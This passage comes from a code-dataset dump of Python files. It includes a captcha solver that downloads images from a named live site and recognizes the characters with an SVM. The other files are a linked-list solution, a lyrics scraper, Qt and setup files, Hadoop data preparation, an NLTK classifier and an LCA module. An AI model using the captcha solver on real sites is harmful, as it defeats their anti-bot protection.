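# Editor's note -- a minimal sketch (an assumption, not the real code) of what\n        # the imported huidu_JZ helper appears to do; its implementation lives in\n        # utils.utils: convert to 8-bit grayscale, then binarize at the threshold.\n        # def huidu_JZ_sketch(img, threshold):\n        #     gray = img.convert(\"L\")  # PIL 8-bit grayscale\n        #     return gray.point(lambda p: 0 if p < threshold else 255)\n        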
file_path = \"../image/test.png\"\n with open(file_path, \"wb\") as img_file:\n img_file.write(response.content)\n\n # 灰度降噪\n image = Image.open(file_path)\n image = huidu_JZ(image, 200)\n\n # 9宫格降噪\n image = _9_gg_JZ(image, 1)\n # print_image(image)\n\n # 去边框\n image = remove_border(image)\n # print_image(image)\n\n # 字符提取\n image_list = image_crop(image, 6)\n for child_image in image_list:\n child_image.save(\"../image/biao_zhu/{name}.jpeg\".format(name=uuid.uuid4()))\n print(\"=====>> {0}\".format(i))\n\n\nif __name__ == \"__main__\":\n \"\"\"仅仅是为了测试识别效果\"\"\"\n # just fot test\n if os.path.exists(\"test.png\"):\n os.remove(\"test.png\")\n if os.path.exists(\"test_file\"):\n os.remove(\"test_file\")\n\n # 下载新图片\n response = requests.get(\n url=\"http://bm.e21cn.com/func/checkcode.ashx\"\n )\n file_path = \"test.png\"\n with open(file_path, \"wb\") as img_file:\n img_file.write(response.content)\n\n # 灰度降噪、图片2值化\n image = Image.open(file_path)\n image = huidu_JZ(image, 200)\n # print_image(image)\n\n # 9宫格降噪\n image = _9_gg_JZ(image, 1)\n # print_image(image)\n\n # 去边框\n image = remove_border(image)\n # print_image(image)\n\n # 字符提取\n image_list = image_crop(image, 6)\n\n with open(\"test_file\", \"a\") as test_file:\n for i in range(len(image_list)):\n child_image = image_list[i]\n\n image = Image.open(file_path)\n width = child_image.width\n height = child_image.height\n\n svm_result = str(i) + \" \"\n # 记录y\n for y in range(11): # 此处11是图片最大宽高\n count = 0\n if y >= height:\n svm_result += \"{0}:{1} \".format(y + 1, count)\n continue\n for x in range(11):\n if x >= width:\n continue\n pixel = child_image.getpixel((x, y))\n if pixel == 0:\n count += 1\n svm_result += \"{0}:{1} \".format(y + 1, count)\n\n # 记录x\n for x in range(11):\n count = 0\n if x >= width:\n svm_result += \"{0}:{1} \".format(x + 12, count)\n continue\n for y in range(11):\n if y >= height:\n continue\n pixel = child_image.getpixel((x, y))\n if pixel == 0:\n count += 1\n svm_result += \"{0}:{1} \".format(x + 12, count)\n\n test_file.write(svm_result.strip() + \"\\n\")\n # 开始识别\n yt, xt = svm_read_problem(\"test_file\")\n model = svm_load_model(\"model\")\n p_label, p_acc, p_val = svm_predict(yt, xt, model)\n for result in p_label:\n print(mapper[str(result)], end=\"\")\n","sub_path":"decoder/low_01.py","file_name":"low_01.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"179709209","text":"#\n# @lc app=leetcode id=25 lang=python\n#\n# [25] Reverse Nodes in k-Group\n#\n# https://leetcode.com/problems/reverse-nodes-in-k-group/description/\n#\n# algorithms\n# Hard (38.20%)\n# Likes: 1443\n# Dislikes: 290\n# Total Accepted: 211.3K\n# Total Submissions: 553.1K\n# Testcase Example: '[1,2,3,4,5]\\n2'\n#\n# Given a linked list, reverse the nodes of a linked list k at a time and\n# return its modified list.\n#\n# k is a positive integer and is less than or equal to the length of the linked\n# list. 
If the number of nodes is not a multiple of k then left-out nodes in\n# the end should remain as it is.\n#\n#\n#\n#\n# Example:\n#\n# Given this linked list: 1->2->3->4->5\n#\n# For k = 2, you should return: 2->1->4->3->5\n#\n# For k = 3, you should return: 3->2->1->4->5\n#\n# Note:\n#\n#\n# Only constant extra memory is allowed.\n# You may not alter the values in the list's nodes, only nodes itself may be\n# changed.\n#\n#\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution(object):\n def reverseKGroup(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n if self.get_length(head) < k:\n return head\n\n pre = None\n curr = head\n count = k\n while curr and count > 0:\n next = curr.next\n curr.next = pre\n pre = curr\n curr = next\n count -= 1\n\n # pre is the new head\n # head is the new tail\n # curr is the next list\n head.next = self.reverseKGroup(curr, k)\n return pre\n\n def get_length(self, head):\n count = 0\n p = head\n while p:\n count += 1\n p = p.next\n return count\n\n\n# @lc code=end\n\n","sub_path":"Python/25.reverse-nodes-in-k-group.py","file_name":"25.reverse-nodes-in-k-group.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"76165411","text":"from bs4 import BeautifulSoup\r\nimport urllib.request\r\nimport os\r\n\r\n\r\n# Създаваме списък, който ще държи всички страници (за всяка една буква, с която започва името на изпълнителя):\r\n# Първият елемент е за тези, чийто псевдоним започва с число\r\nall_lyrics_index = ['https://www.eurobeat-prime.com/lyrics.php?artist=1']\r\n\r\n\r\n# Допълваме листа с буквите от A до Z\r\nfor letter in range(ord('a'), ord('z') + 1):\r\n all_lyrics_index.append(f'https://www.eurobeat-prime.com/lyrics.php?artist={chr(letter)}')\r\n\r\n\r\n# Минаваме през всички страници и записваме файл с имена и линкове за всички песни:\r\nwith open('all_songs.txt', 'w') as outfile:\r\n for page in all_lyrics_index:\r\n html_page = urllib.request.urlopen(page)\r\n soup = BeautifulSoup(html_page, 'html.parser')\r\n print(soup.findAll(\"div\", class_=\"mmids\"), file=outfile)\r\n\r\n\r\n# Обработка на информацията от файла - премахваме излишни неща, пълним отделни променливи за име на изпълнител, име на песен, линк и\r\n# ID (което взимаме от ID-то от линка с текста на песента).\r\n# Пълним списък от списъци с необходимата ни информация\r\nartist_song_list_raw = [[] for _ in range(10000)] # тук дефинирам някаква голяма бройка списъци съдържащи се в основния списък, за да съм сигурен, че няма да ми даде out of range. Списъка на песни е повече от два пъти по-малко.\r\nline_number = 0\r\nwith open('all_songs.txt') as input_file:\r\n for line in input_file:\r\n if line != '[
<div class=\"mmids\">\\n' and line != '</div>]\\n' and line != '<br/><br/>\\n': # skips the extra rows\r\n            txt = str(line).replace('<b>', '').replace('</b>', '').replace('&amp;', '&').replace('#:<br/><br/>', '') # removes the unneeded html elements\r\n            if '?lyrics=' in txt: # only rows that actually contain a song link\r\n                song_id = txt[txt.index('?lyrics=') + 8:txt.index('\">')]\r\n                artist_name = txt[:txt.index(' - ')].replace('\\n', '')\r\n                song_name = txt[txt.index('\">') + 2:txt.index('</a>')]\r\n                lyrics_link = 'https://www.eurobeat-prime.com/lyrics.php?lyrics=' + song_id\r\n                artist_song_list_raw[line_number].append(str(artist_name) + ' - ' + str(song_name))\r\n                artist_song_list_raw[line_number].append(song_id)\r\n                artist_song_list_raw[line_number].append(artist_name)\r\n                artist_song_list_raw[line_number].append(song_name)\r\n                artist_song_list_raw[line_number].append(lyrics_link)\r\n                artist_song_list_raw[line_number].append('https://www.youtube.com/results?search_query=' + artist_name.replace(' ', '+').replace('&', 'and') + '+-+' + song_name.replace(' ', '+').replace('&', 'and'))\r\n                line_number += 1\r\n\r\n\r\n# Clear the empty sublists out of the data list\r\nartist_song_list = list()\r\nfor lst in range(len(artist_song_list_raw)):\r\n    if len(artist_song_list_raw[lst]) > 0:\r\n        artist_song_list.append(artist_song_list_raw[lst])\r\n\r\n\r\n# Delete the now-unneeded all_songs.txt\r\nos.remove(\"all_songs.txt\")\r\n\r\n","sub_path":"get_titles_and_links.py","file_name":"get_titles_and_links.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"131679238","text":"from setuptools import setup, find_packages  # type: ignore\n\n\ndef main():\n    pkg = 'ghexport'\n    pkgs = find_packages('src')\n    return setup(\n        name=pkg,\n        zip_safe=False,\n        packages=pkgs,\n        package_dir={'': 'src'},\n        package_data={pkg: ['py.typed']},\n\n        url='',\n        author='',\n        author_email='',\n        description='',\n\n        install_requires=[\n            'pytz',\n            'PyGithub',\n        ],\n        extras_require={\n            'testing': ['pytest'],\n            'linting': ['pytest', 'mypy'],\n        },\n    )\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"585095176","text":"#!/usr/bin/env python3\nfrom PySide2.QtCore import *\nfrom PySide2.QtGui import QMovie\nfrom PySide2.QtWidgets import *\n\n\nclass ImagePlayerDialog(QDialog):\n    def __init__(self, filename, parent=None):\n        super(ImagePlayerDialog, self).__init__(parent=parent)\n        # Load the file into a QMovie\n        self.setWindowFlags(Qt.FramelessWindowHint)\n        self.setAttribute(Qt.WA_NoSystemBackground, True)\n        self.setAttribute(Qt.WA_TranslucentBackground, True)\n        self.movie = QMovie(filename, QByteArray(), self)\n        size = self.movie.scaledSize()\n        self.movie_screen = QLabel()\n        # Make label fit the gif\n        self.movie_screen.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)\n        self.movie_screen.setAlignment(Qt.AlignCenter)\n\n        # Create the layout\n        main_layout = QVBoxLayout()\n        main_layout.addWidget(self.movie_screen)\n\n        self.setLayout(main_layout)\n\n        # Add the QMovie object to the label\n        self.movie.setCacheMode(QMovie.CacheAll)\n        self.movie.setSpeed(100)\n        self.movie_screen.setMovie(self.movie)\n        self.__time_out_timer = QTimer()\n        self.__time_out_timer.timeout.connect(lambda: self.accept())\n        self.__time_out_timer.setSingleShot(True)\n        self.__time_out_timer.start(2000)\n        self.movie.start()\n        self.setMinimumSize(500, 500)\n\n","sub_path":"view_managers/gif_player_dialog.py","file_name":"gif_player_dialog.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
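To sanity-check the slicing logic restored in the get_titles_and_links.py record above, here is a standalone Python sketch; the sample string is a guessed approximation of the site's markup (the exact tags are an assumption, not taken from the record):

# Standalone sketch of the id/artist/title extraction used in get_titles_and_links.py.
# The sample line below is hypothetical; the real eurobeat-prime.com markup may differ.
sample = '<b>Dave Rodgers</b> - <a href="lyrics.php?lyrics=123">Deja Vu</a><br/>'
txt = sample.replace('<b>', '').replace('</b>', '').replace('&amp;', '&')
song_id = txt[txt.index('?lyrics=') + 8:txt.index('">')]  # -> '123'
artist_name = txt[:txt.index(' - ')]                      # -> 'Dave Rodgers'
song_name = txt[txt.index('">') + 2:txt.index('</a>')]    # -> 'Deja Vu'
print(song_id, artist_name, song_name)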
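And a minimal usage sketch for the ImagePlayerDialog record above, assuming PySide2 is installed, that the class is importable from its module, and that a spinner.gif file exists beside the script (the file name and import path are illustrative assumptions):

# Hypothetical launcher for ImagePlayerDialog from the gif_player_dialog.py record.
import sys
from PySide2.QtWidgets import QApplication
from gif_player_dialog import ImagePlayerDialog  # assumed import path

if __name__ == '__main__':
    app = QApplication(sys.argv)               # Qt requires an application object first
    dialog = ImagePlayerDialog('spinner.gif')  # starts the movie and a 2-second QTimer
    dialog.exec_()                             # blocks until the timer fires accept()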
+{"seq_id":"288437553","text":"# -*- coding: utf-8 -*-\r\nimport pandas as pd\r\nimport numpy as np\r\nimport json\r\nimport os\r\nimport codecs\r\nimport pickle as pk\r\nimport argparse\r\nimport warnings\r\nimport logging\r\n\r\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s-[%(levelname)s]: - %(message)s')\r\nlogger = logging.getLogger(__name__)\r\n\r\nlogger.info('[AI-MAP] GenDfmSampleNormal')\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--input0', type=str)\r\nparser.add_argument('--input1', type=str)\r\nparser.add_argument('--input2', type=str)\r\nparser.add_argument('--input3', type=str)\r\nparser.add_argument('--input4', type=str)\r\nparser.add_argument('--input5', type=str)\r\nparser.add_argument('--input6', type=str)\r\nparser.add_argument('--input7', type=str)\r\nparser.add_argument('--input8', type=str)\r\nparser.add_argument('--input9', type=str)\r\nparser.add_argument('--input10', type=str)\r\nparser.add_argument('--input11', type=str)\r\n\r\nparser.add_argument('--output0', type=str)\r\n\r\ninfo = parser.parse_args()\r\nrun_flag = info.input0\r\ntrain_sample_path = info.input1\r\nclient_feas_col_path = info.input2\r\nprdt_feas_col_path = info.input3\r\nclient_feas_col_number_path = info.input4\r\nmean_std_path = info.input5\r\ndiscrete_path = info.input6\r\nquantile_path = info.input7\r\ntrain_flag = info.input8\r\nnumber_flag = info.input9\r\nresult_train_sample_path = info.input10\r\nkeytab_file = info.input11\r\n\r\nresult_flag = info.output0\r\n\r\ntry:\r\n train_flag = int(train_flag)\r\nexcept:\r\n logger.warning(\"[AI-MAP]-param:train_flag transition failed,use default value:1\")\r\n train_flag = 1\r\n\r\ntry:\r\n number_flag = int(number_flag)\r\nexcept:\r\n logger.warning(\"[AI-MAP]-param:number_flag transition failed,use default value:1\")\r\n number_flag = 1\r\n\r\nlogger.info('[AI-MAP]-train_sample_path: %s' % train_sample_path)\r\nlogger.info('[AI-MAP]-client_feas_col_path: %s' % client_feas_col_path)\r\nlogger.info('[AI-MAP]-prdt_feas_col_path: %s' % prdt_feas_col_path)\r\nlogger.info('[AI-MAP]-client_feas_col_number_path: %s' % client_feas_col_number_path)\r\nlogger.info('[AI-MAP]-mean_std_path: %s' % mean_std_path)\r\nlogger.info('[AI-MAP]-discrete_path: %s' % discrete_path)\r\nlogger.info('[AI-MAP]-quantile_path: %s' % quantile_path)\r\nlogger.info('[AI-MAP]-train_flag: %s' % train_flag)\r\nlogger.info('[AI-MAP]-number_flag: %s' % number_flag)\r\nlogger.info('[AI-MAP]-result_train_sample_path: %s' % result_train_sample_path)\r\nlogger.info('[AI-MAP]-kerberos_file: %s' % keytab_file)\r\n\r\n# local_file 类型:string 默认值:无 说明: 训练数据拉取到本地的地址\r\n# hdfs_path 类型:string 默认值:None 说明: 训练数据在hdfs上面的地址\r\n# user_cols_file 类型: string 默认值:无 说明: 客户特征文件\r\n# prdt_cols_file 类型:string 默认值:无 说明: 产品特征文件\r\n# user_number_feas_file 类型:string 默认值:无 说明:客户数值型特征文件\r\n# mean_std_path 类型: string 默认值:无 说明:mean_std文件\r\n# discrete_path 类型: string 默认值:无 说明:discrete文件\r\n# train_flag 类型: string 默认值:1 说明:数据的格式\r\n# number_flag 类型: string 默认值:1 说明:数值类型的特征处理方式\r\n# result_train_sample_path 结果文件存放地址\r\n# keytab_file 类型:string 默认值:无 说明:kerberos认证用户的秘钥\r\n\r\nuser_columns = pd.read_csv(client_feas_col_path, header=None, sep=\"\\t\")\r\nuser_columns = np.array(user_columns).tolist()[0]\r\nprint('user_columns', len(user_columns))\r\n\r\nfund_columns = pd.read_csv(prdt_feas_col_path, header=None, sep=\"\\t\")\r\nfund_columns = np.array(fund_columns).tolist()[0]\r\nprint('fund_columns', 
len(fund_columns))\r\n\r\nuser_and_fund_columns = user_columns + fund_columns\r\nindex_columns = [c + \"-index\" for c in user_and_fund_columns]\r\nvalue_columns = [c + \"-value\" for c in user_and_fund_columns]\r\nall_total_columns = ['label']\r\nall_total_columns.extend(user_and_fund_columns)\r\n\r\nnumber_columns = pd.read_csv(client_feas_col_number_path, header=None)\r\nnumber_columns = np.array(number_columns).tolist()\r\nnumber_columns = [item[0] for item in number_columns]\r\n# fund number columns\r\nnumber_columns.extend(['nav_total', 'issuevol'])\r\nprint('-----------number columns-------')\r\nprint(number_columns)\r\nprint(len(number_columns))\r\n\r\n# 此函数没有用过\r\ndef birth_handle(item):\r\n if item is not None and item != 'None' and len(item.strip()) == 4:\r\n return item.strip()\r\n else:\r\n result = 1960 if item is None or item == 'None' else int(item) / 10000\r\n return str(int(result))\r\n\r\n\r\ndef none2zero(item):\r\n return '0' if item is None or item == 'None' else item.strip()\r\n\r\n\r\ndef get_data(col_names):\r\n \"\"\"\r\n Get data from local_file,if hdfs_path is not None, get data from HDFS file.\r\n :param col_names:\r\n :return:\r\n \"\"\"\r\n try:\r\n logger.info(\"[AI-MAP]- read data and do some transformation\")\r\n # train_sample_path\r\n data = pd.read_csv(train_sample_path, header=None, names=col_names, sep='\\t', dtype='str')\r\n print(data.shape)\r\n print(data.head(5))\r\n print('-------------col names------------')\r\n print(col_names)\r\n print(len(col_names))\r\n\r\n # transform the None to 0, and transform the data type\r\n count = 0\r\n tot_count = len(col_names)\r\n for column in data.columns:\r\n count += 1\r\n print('%s : %d - %d' % (column, count, tot_count))\r\n data[column] = data[column].apply(none2zero)\r\n if column in number_columns:\r\n data[column] = data[column].astype('float32')\r\n\r\n return data\r\n except:\r\n raise Exception(\"[ERROR]-[AI-MAP]: GenDfmSample Module Execute Failed!\")\r\n\r\n\r\ndef __do_discrete(data, values):\r\n \"\"\"\r\n do discretion\r\n :param data:\r\n :param values:\r\n :return:\r\n \"\"\"\r\n try:\r\n # 异常值处理为0\r\n if values:\r\n logger.info(\"[AI-MAP]- handle the exception data\")\r\n for key in values.keys():\r\n data[key] = data[key].apply(lambda x: x if x in values[key] else '0')\r\n else:\r\n logger.info(\"[AI-MAP]- Non-numerical feature do not exist\")\r\n\r\n logger.info(\"[AI-MAP]- feature one-hot\")\r\n pos = 0\r\n feature_size = 0\r\n for column in user_and_fund_columns:\r\n print('col = %s' % column)\r\n # 数值型,保存下标索引和值\r\n if column in number_columns:\r\n if 2 == number_flag:\r\n print('quantile_trans start')\r\n with codecs.open(quantile_path, 'r', encoding=\"utf-8\") as f:\r\n quantile = json.load(f)\r\n data[column + \"-index\"] = data[column].apply(__num_dis, args=[quantile[column], pos])\r\n data[column + \"-value\"] = 1\r\n pos += 4\r\n feature_size += 4\r\n else:\r\n data[column + \"-index\"] = pos\r\n data[column + \"-value\"] = data[column]\r\n pos += 1\r\n feature_size += 1\r\n else:\r\n # 枚举型,one-hot编码,只存储有值的部分\r\n data[column + \"-index\"] = data[column].apply(lambda x: values[column].index(x) + pos)\r\n data[column + \"-value\"] = 1\r\n pos += len(values[column])\r\n feature_size += len(values[column])\r\n data = data.drop(column, axis=1) # 删除列\r\n numeric_cols = list(set(data.columns) - set(['client_id', 'prdt_code']))\r\n data[numeric_cols] = data[numeric_cols].apply(pd.to_numeric, downcast=\"unsigned\")\r\n return data, feature_size\r\n except:\r\n raise 
Exception(\"[ERROR]-[AI-MAP]: GenDfmSampleNormal Module Execute Failed!\")\r\n\r\n\r\ndef gen_dfm_sample():\r\n \"\"\"\r\n generate the DFM train or test samples\r\n :return:\r\n \"\"\"\r\n try:\r\n if train_flag == 1:\r\n columns = all_total_columns\r\n else:\r\n columns = ['client_id', 'prdt_code']\r\n columns.extend(all_total_columns)\r\n\r\n data = get_data(columns)\r\n\r\n # z-score normalization\r\n if 1 == number_flag:\r\n print('mean_std_trans start')\r\n with codecs.open(mean_std_path, 'r', encoding=\"utf-8\") as f:\r\n mean_std = json.load(f)\r\n if mean_std:\r\n for c in number_columns:\r\n data[c] = (data[c] - mean_std[c][0]) / mean_std[c][1]\r\n else:\r\n logger.info(\"[AI-MAP]- mean_std not exist\")\r\n\r\n print(\"one-hot encoding start\")\r\n with codecs.open(discrete_path, 'r', encoding=\"utf-8\") as f:\r\n values = json.load(f)\r\n data, feature_size = __do_discrete(data, values)\r\n\r\n logger.info(\"[AI-MAP]- save pkl file\")\r\n # result_file = \"dfm_train_sample\"\r\n result_file_name = train_sample_path.split('/')[-1].replace('sample', 'dfm_sample')\r\n f = open(result_file_name, 'wb')\r\n pk.dump((index_columns, value_columns, feature_size, data), f, 2)\r\n f.close()\r\n\r\n with open(result_flag, 'w') as f_r:\r\n f_r.write('True')\r\n f_r.close()\r\n\r\n # 上传到指定hdfs地址\r\n command = 'export HADOOP_USER_NAME=u006586;hadoop fs -rm %s' % result_train_sample_path + result_file_name\r\n print(command)\r\n os.system(command)\r\n command = 'export HADOOP_USER_NAME=u006586;hadoop fs -put %s %s' % (result_file_name, result_train_sample_path)\r\n print(command)\r\n cmd_status = os.system(command)\r\n if cmd_status != 0:\r\n raise Exception(\"COMMAND : %s \" % command, \"FAILED!!!\")\r\n except:\r\n raise Exception(\"[ERROR]-[AI-MAP]: GenDfmSampleNormal Module Execute Failed!\")\r\n\r\n\r\ndef __num_dis(item, *args):\r\n \"\"\"\r\n :param item: data\r\n :param args: The quartile of a column of data\r\n :return: pos: The result of data discretization\r\n \"\"\"\r\n quantile_col = args[0]\r\n pos = args[1]\r\n if item > quantile_col[2]:\r\n return 3 + pos\r\n elif item > quantile_col[1]:\r\n return 2 + pos\r\n elif item > quantile_col[0]:\r\n return 1 + pos\r\n else:\r\n return pos\r\n\r\nif __name__ == '__main__':\r\n logger.info(\"[AI-MAP]-START GenDfmSampleNormal Module!\")\r\n print(os.listdir('.'))\r\n # kerberos authentication\r\n # keytab = keytab_file.strip('\\n').strip().split('/')[-1]\r\n user = keytab_file.strip('\\n').strip().split('/')[-1].split('.')[0]\r\n command = \"kinit -kt %s %s\" % (keytab_file, user)\r\n print(command)\r\n cmd_status = os.system(command)\r\n if cmd_status != 0:\r\n raise Exception(\"COMMAND : %s \" % command, \"FAILED!!!\")\r\n gen_dfm_sample()\r\n logger.info(\"[AI-MAP]-END GenDfmSampleNormal Module!\")","sub_path":"recommendation/genDfmNormalSample/genDfmNormalSample.py","file_name":"genDfmNormalSample.py","file_ext":"py","file_size_in_byte":10883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"120666064","text":"import re, nltk, random, sys\nimport word_category_counter\nfrom nltk import bigrams\n\nselected_features = None\n\ndef get_score(review):\n return int(re.search(r'Overall = ([1-5])', review).group(1))\n\ndef get_text(review):\n return re.search(r'Text = \"(.*)\"', review).group(1)\n\t\t\n# Write to File, this function is just for reference, because the encoding matters.\ndef write_file(file_name, data):\n file = open(file_name, 'w', encoding=\"utf-8\") # or you can say 
encoding=\"latin1\"\n file.write(data)\n file.close()\n\ndef process_reviews(file_name):\n file = open(file_name, \"rb\")\n raw_data = file.read().decode(\"latin1\")\n file.close()\n \n stopwords = nltk.corpus.stopwords.words(\"english\")\n np = r\"(\\w)\"\n\n texts = []\n for review in re.split(r'\\.\\n', raw_data):\n overall_score = get_score(review)\n review_text = get_text(review)\n if overall_score > 3:\n score = \"positive\"\n else: \n \tscore = \"negative\"\n \t\n words = nltk.word_tokenize(review_text)\n flat_words = [word.lower() for word in words]\n #print(flat_words)\n content = []\n for t in flat_words:\n \tif t not in stopwords:\n \t\tcontent.append(t)\n #print(content)\n content_w = []\n for t in content:\n \tresult = re.search(np, t)\n \tif result != None:\n \t\tcontent_w.append(t)\n \t \n item = (review_text, content_w, score)\n texts.append(item)\n \n return texts\n \t\t\n# Write to File, this function is just for reference, because the encoding matters.\ndef write_file(file_name, data):\n file = open(file_name, 'w', encoding=\"utf-8\") # or you can say encoding=\"latin1\"\n file.write(data)\n file.close()\n\n# Adds unigram based lexical features\ndef add_lexical_features(fdist, bidist, feature_vector, text):\n\ttext_t = nltk.word_tokenize(text)\n\ttext_nl = nltk.Text(text_t)\n\ttext_len = len(text_nl)\n\t\n\t#unigram features\n\tfor word, freq in fdist.items(): # fdist = nltk.FreqDist(review_words)\n\t\tfname = \"UNI_\" + word\n \n # If we haven't selected any features yet then add the feature to\n # our feature vector\n # Otherwise make sure the feature is one of the ones we want\n # Note we use a Set for the selected features for O(1) lookup\n\t\tif selected_features == None or fname in selected_features:\n #feature_vector[fname] = 1 \n\t\t\t#num_of_w = text_nl.count(word)\n\t\t\tfeature_vector[fname] = fdist.freq(word)\n\t\n\t#let's add a new feature \"len of text\"\n\tfname = \"text_len\"\n\tfeature_vector[fname] = text_len\n\t\n\t#bigram features\n\tfor word, freq in bidist.items(): # fdist = nltk.FreqDist(review_words)\n\t\tfname = \"BIGRAM_\" + word[0] + \"_\" + word[1]\n\t\tif selected_features == None or fname in selected_features:\n\t\t\t#feature_vector[fname] = 1 \n\t\t\t#num_of_w = text_nl.count(word)\n\t\t\tfeature_vector[fname] = bidist.freq(word)\n\t\n\ttol_text = nltk.pos_tag(text_t)\n\t\n\t#unigram part-of-speech features\n\tfdist_pos = nltk.FreqDist(tag for (word, tag) in tol_text)\n\tfor word, freq in fdist_pos.items(): \n\t\tfname = \"UNIPOS_\" + word\n\t\tif selected_features == None or fname in selected_features:\n #feature_vector[fname] = 1 \n\t\t\t#num_of_w = text_nl.count(word)\n\t\t\tfeature_vector[fname] = fdist_pos.freq(word)\n\t\t\n\tmy_bigrams_pos = list(bigrams(tol_text))\n\t#to create a list of bigram's part-of-speech \n\tbi_part_of_speach = []\n\tfor item in my_bigrams_pos:\n\t\ta = (item[0][1], item[1][1])\n\t\tbi_part_of_speach.append(a)\n\t\n\tbidist_pos = nltk.FreqDist(bi_part_of_speach)\n\tfor word, freq in bidist_pos.items(): \n\t\tfname = \"BIPOS_\" + word[0] + \"_\" + word[1]\n\t\tif selected_features == None or fname in selected_features:\n\t\t\tfeature_vector[fname] = bidist_pos.freq(word)\n\t\t\t\n# Adds a simple LIWC derived feature\ndef add_liwc_features(text, feature_vector):\n liwc_scores = word_category_counter.score_text(text)\n \n negative_score = liwc_scores[\"Negative Emotion\"]\n positive_score = liwc_scores[\"Positive Emotion\"]\n\n if positive_score > negative_score:\n feature_vector[\"liwc:positive\"] = 1\n else:\n 
feature_vector[\"liwc:negative\"] = 1\n \n# Adds all our features and returns the vector\ndef features(review_text, review_words):\n feature_vector = {}\n\n uni_dist = nltk.FreqDist(review_words)\n \n my_bigrams = list(bigrams(review_words))\n bi_dist = nltk.FreqDist(my_bigrams)\n \n add_lexical_features(uni_dist, bi_dist, feature_vector, review_text)\n add_liwc_features(review_text, feature_vector)\n return feature_vector\n\n#python3 DT_baseline_train.py restaurant-training.data\nif __name__ == '__main__':\n file_name = sys.argv[1]\n texts = process_reviews(file_name)\n \n # Make sure we split the same way every time for the live coding\n random.seed(0)\n \n # Make sure to randomize the reviews first!\n random.shuffle(texts)\n \n # Convert the data into feature vectors\n featuresets = [\n (features(review_text, review_words), label) \n for (review_text, review_words, label) in texts\n ]\n \t\n # Train on the training data\n classifier = nltk.classify.DecisionTreeClassifier.train(featuresets, entropy_cutoff=0, support_cutoff=0)\n \n import pickle\n f = open(\"dt−classifier.pickle\", \"wb\")\n pickle.dump(classifier, f)\n f.close()\n","sub_path":"scripts/webExample.py","file_name":"webExample.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"200849164","text":"\"\"\"\nEmbodied energy and related grey emissions model algorithm\n\"\"\"\nfrom __future__ import division\n\nimport os\nimport numpy as np\nimport pandas as pd\nfrom cea.datamanagement.data_helper import calc_mainuse\nfrom cea.datamanagement.data_helper import calc_category\nfrom cea.utilities.dbf import dbf_to_dataframe\nfrom geopandas import GeoDataFrame as Gdf\nimport cea.globalvar\nimport cea.inputlocator\nimport cea.config\nfrom cea.constants import SERVICE_LIFE_OF_BUILDINGS, SERVICE_LIFE_OF_TECHNICAL_SYSTEMS, CONVERSION_AREA_TO_FLOOR_AREA_RATIO\n\n__author__ = \"Jimeno A. Fonseca\"\n__copyright__ = \"Copyright 2015, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Jimeno A. Fonseca\", \"Martin Mosteiro\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"cea@arch.ethz.ch\"\n__status__ = \"Production\"\n\n\ndef lca_embodied(year_to_calculate, locator, config, gv):\n \"\"\"\n Algorithm to calculate the embodied emissions and non-renewable primary energy of buildings according to the method\n of [Fonseca et al., 2015] and [Thoma et al., 2014]. 
The calculation method assumes a 60 year payoff for the embodied\n energy and emissions of a building, after which both values become zero.\n\n The results are provided in total as well as per square meter:\n\n - embodied non-renewable primary energy: E_nre_pen_GJ and E_nre_pen_MJm2\n - embodied greenhouse gas emissions: E_ghg_ton and E_ghg_kgm2\n\n As part of the algorithm, the following files are read from InputLocator:\n\n - architecture.shp: shapefile with the architecture of each building\n locator.get_building_architecture()\n - occupancy.shp: shapefile with the occupancy types of each building\n locator.get_building_occupancy()\n - age.shp: shapefile with the age and retrofit date of each building\n locator.get_building_age()\n - zone.shp: shapefile with the geometry of each building in the zone of study\n locator.get_zone_geometry()\n - Archetypes_properties: csv file with the database of archetypes including embodied energy and emissions\n locator.get_archetypes_properties()\n\n As a result, the following file is created:\n\n - Total_LCA_embodied: .csv\n csv file of yearly primary energy and grey emissions per building stored in locator.get_lca_embodied()\n\n :param year_to_calculate: year between 1900 and 2100 indicating when embodied energy is evaluated\n to account for emissions already offset from building construction and retrofits more than 60 years ago.\n :type year_to_calculate: int\n :param locator: an instance of InputLocator set to the scenario\n :type locator: InputLocator\n :returns: This function does not return anything\n :rtype: NoneType\n\n .. [Fonseca et al., 2015] Fonseca et al. (2015) \"Assessing the environmental impact of future urban developments at\n neighborhood scale.\" CISBAT 2015.\n .. [Thoma et al., 2014] Thoma et al. (2014). 
